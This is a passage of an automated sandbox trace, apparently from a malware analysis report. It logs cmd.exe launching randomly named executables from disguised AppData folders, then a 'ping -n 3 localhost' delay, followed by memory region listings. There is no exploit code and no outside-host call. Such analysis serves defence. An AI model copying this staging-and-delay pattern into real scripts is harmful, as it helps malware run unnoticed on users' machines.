dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.589] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.589] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.589] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.589] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.589] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.589] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, 
lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.590] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.590] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.590] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.590] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.590] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.590] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.590] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.590] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.590] _get_osfhandle (_FileHandle=4) returned 0x54 
[0096.590] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.590] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.591] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.591] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.591] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.591] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.591] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.591] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.591] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.592] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.592] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.592] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.592] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.592] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.592] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.592] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.592] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.592] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, 
lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.592] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18de2c | out: lpNewFilePointer=0x0) returned 1 [0096.592] _get_osfhandle (_FileHandle=4) returned 0x54 [0096.592] ReadFile (in: hFile=0x54, lpBuffer=0x18ec5c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18de4c, lpOverlapped=0x0 | out: lpBuffer=0x18ec5c*, lpNumberOfBytesRead=0x18de4c*=0x200, lpOverlapped=0x0) returned 1 [0096.613] _close (_FileHandle=4) returned 0 [0096.613] FindNextFileW (in: hFindFile=0x1a20b8, lpFindFileData=0x18eec0 | out: lpFindFileData=0x18eec0) returned 0 [0096.614] GetLastError () returned 0x12 [0096.614] FindClose (in: hFindFile=0x1a20b8 | out: hFindFile=0x1a20b8) returned 1 [0096.614] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0096.651] _close (_FileHandle=3) returned 0 [0096.710] GetConsoleTitleW (in: lpConsoleTitle=0x18f35c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.710] GetFileAttributesW (lpFileName="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\"" (normalized: "c:\\users\\eebsym5\\desktop\\\"c:\\users\\eebsym5\\appdata\\roaming\\micros~1\\lsfkrhur.exe\"")) returned 0xffffffff [0096.710] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0096.710] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0096.710] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0096.710] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0096.710] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0096.710] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0096.710] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0096.710] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0096.710] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0096.710] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0096.710] 
_wcsicmp (_String1="\"C", _String2="SET") returned -81 [0096.710] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0096.710] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0096.710] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0096.710] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0096.710] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0096.710] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0096.710] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0096.710] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0096.710] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0096.710] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0096.710] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0096.710] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0096.710] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0096.710] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0096.710] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0096.710] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0096.710] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0096.710] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0096.710] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0096.710] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0096.711] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0096.711] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0096.711] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0096.711] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0096.711] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0096.711] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0096.711] _wcsicmp (_String1="\"C", 
_String2="BREAK") returned -64 [0096.711] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0096.711] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0096.711] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0096.711] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0096.711] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0096.711] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0096.711] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0096.711] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0096.711] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0096.711] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0096.711] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0096.711] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0096.711] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0096.711] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0096.711] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0096.711] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0096.711] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0096.711] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0096.711] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0096.711] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0096.711] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0096.711] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0096.711] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0096.711] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0096.711] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0096.711] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0096.711] _wcsicmp 
(_String1="\"C", _String2="EXIT") returned -67 [0096.711] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0096.711] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0096.711] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0096.711] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0096.711] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0096.711] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0096.711] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0096.711] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0096.711] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0096.712] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0096.712] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0096.712] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0096.712] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0096.712] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0096.712] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0096.712] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0096.712] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0096.712] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0096.712] SetErrorMode (uMode=0x0) returned 0x0 [0096.712] SetErrorMode (uMode=0x1) returned 0x0 [0096.712] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\.", nBufferLength=0x208, lpBuffer=0x1a0620, lpFilePart=0x18ee7c | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1", lpFilePart=0x18ee7c*="MICROS~1") returned 0x29 [0096.712] SetErrorMode (uMode=0x0) returned 0x1 [0096.712] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\.") returned 1 [0096.712] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 
[0096.715] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.715] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe", fInfoLevelId=0x1, lpFindFileData=0x18ec18, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec18) returned 0x1a20b8 [0096.715] FindClose (in: hFindFile=0x1a20b8 | out: hFindFile=0x1a20b8) returned 1 [0096.716] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0096.716] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0096.716] GetConsoleTitleW (in: lpConsoleTitle=0x18f0f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.716] InitializeProcThreadAttributeList (in: lpAttributeList=0x18ef78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f040 | out: lpAttributeList=0x18ef78, lpSize=0x18f040) returned 1 [0096.716] UpdateProcThreadAttribute (in: lpAttributeList=0x18ef78, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f038, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18ef78, lpPreviousValue=0x0) returned 1 [0096.716] GetStartupInfoW (in: lpStartupInfo=0x18ef34 | out: lpStartupInfo=0x18ef34*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0096.716] _wcsnicmp (_String1="COPYCMD", 
_String2="ComSpec", _MaxCount=0x7) returned 3 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", 
_MaxCount=0x7) returned -17 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0096.716] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0096.717] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0096.717] lstrcmpW (lpString1="\\LSfkRHur.exe", lpString2="\\XCOPY.EXE") returned -1 [0096.718] CreateProcessW (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x18efd4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f020 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\MICROS~1\\LSfkRHur.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Sypykbck.exe\" 1", lpProcessInformation=0x18f020*(hProcess=0x50, hThread=0x4c, dwProcessId=0xba4, dwThreadId=0xba8)) returned 1 [0097.349] CloseHandle (hObject=0x4c) returned 1 [0097.349] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0097.349] GetEnvironmentStringsW () 
returned 0x1a2d70* [0097.349] FreeEnvironmentStringsW (penv=0x1a2d70) returned 1 [0097.349] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0100.237] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x18ef14 | out: lpExitCode=0x18ef14*=0x0) returned 1 [0100.237] CloseHandle (hObject=0x50) returned 1 [0100.237] _vsnwprintf (in: _Buffer=0x18f05c, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ef20 | out: _Buffer="00000000") returned 8 [0100.237] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0100.237] GetEnvironmentStringsW () returned 0x1a24f0* [0100.238] FreeEnvironmentStringsW (penv=0x1a24f0) returned 1 [0100.238] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0100.238] GetEnvironmentStringsW () returned 0x1a24f0* [0100.238] FreeEnvironmentStringsW (penv=0x1a24f0) returned 1 [0100.238] DeleteProcThreadAttributeList (in: lpAttributeList=0x18ef78 | out: lpAttributeList=0x18ef78) [0100.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.238] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.238] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.238] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.238] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.238] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.238] SetConsoleInputExeNameW () returned 0x1 [0100.238] GetConsoleOutputCP () returned 0x1b5 [0100.238] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.238] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.238] exit (_Code=0) Process: id = "13" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea167a0" os_pid = "0xb3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xafc" cmd_line = "ping -n 3 
localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 899 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 900 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 901 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 902 start_va = 0x1c0000 end_va = 0x1c7fff entry_point = 0x1c0000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 903 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 904 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id 